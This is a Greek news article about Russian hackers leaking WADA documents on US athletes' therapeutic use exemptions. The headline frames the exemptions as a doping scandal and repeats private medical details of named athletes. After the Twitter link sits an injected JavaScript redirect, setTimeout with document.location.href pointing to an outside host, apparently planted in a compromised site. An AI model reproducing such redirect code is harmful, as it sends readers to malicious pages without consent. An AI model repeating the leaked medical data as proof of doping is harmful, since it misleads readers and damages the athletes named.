Βόμβα! Ρώσοι χάκερ «αποκαλύπτουν» σκάνδαλο ντόπινγκ με Αμερικανούς στο Ρίο

0
10

 

Μία είδηση «βόμβα» που εάν επιβεβαιωθεί θα φέρει τα πάνω-κάτω για το σκάνδαλο ντόπινγκ στους Ολυμπιακούς Αγώνες του Ρίο, προέκυψε μέσω Ρώσων χάκερς, οι οποίοι υπέκλεψαν έγγραφα από τoν WADA.

Σύμφωνα με αυτά, κορυφαία ονόματα του Αμερικανικού αθλητισμού βρίσκονται στη λίστα με τους «ντοπαρισμένους», αλλά για άγνωστους λόγους, δεν δόθηκαν ποτέ στη δημοσιότητα.

Οι αθλήτριες που βρίσκονται στο «στόχαστρο» είναι οι τενίστριες Σερένα και Βένους Γουίλιαμς, η παγκόσμια πρωταθλήτρια της γυμναστικής Σιμόν Μπάιλς (4 χρυσά μετάλλια) και η μπασκετμπολίστρια, Έλενα Ντέλε Ντόνε.

Oι Αμερικανοί πρωταθλητές, δικαιολόγησαν με ιατρικά πιστοποιητικά υψηλές τιμές απαγορευμένων ουσιών που βρέθηκαν στο αίμα τους σε εξετάσεις που υποβλήθηκαν πριν αλλά και κατά τη διάρκεια των Αγώνων.

Όπως αναφέρεται χαρακτηριστικά «επετράπη η χρήση παράνομων ουσιών, η οποία δικαιολογείται από πιστοποιητικά έγκρισης για θεραπευτική χρήση».

Στη συνέχεια οι χάκερς δημοσιοποίησαν έγγραφα που αναφέρουν τις αμφιβολίες της ομοσπονδίας, όπου αναφέρεται πως «υπάρχουν ανεπαρκείς εξηγήσεις από τους αθλητές για τα πιστοποιητικά».

Στην περίπτωση της Μπάιλς μάλιστα, η συνταγή αναφέρει την λήψη αμφεταμινών!

Η περίπτωση των πιστοποιητικών είναι σίγουρα αμφιλεγόμενη. Συχνά τέτοιου είδους πιστοποιητικά γίνονται αποδεκτά, άλλες φορές όμως απορρίπτονται με αποτέλεσμα να υπάρξουν ποινές και αγωνιστικοί αποκλεισμοί, με χαρακτηριστικό παράδειγμα αυτό της Σαράποβα.

https://twitter.com/FancyBears/status/775464800646205440 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here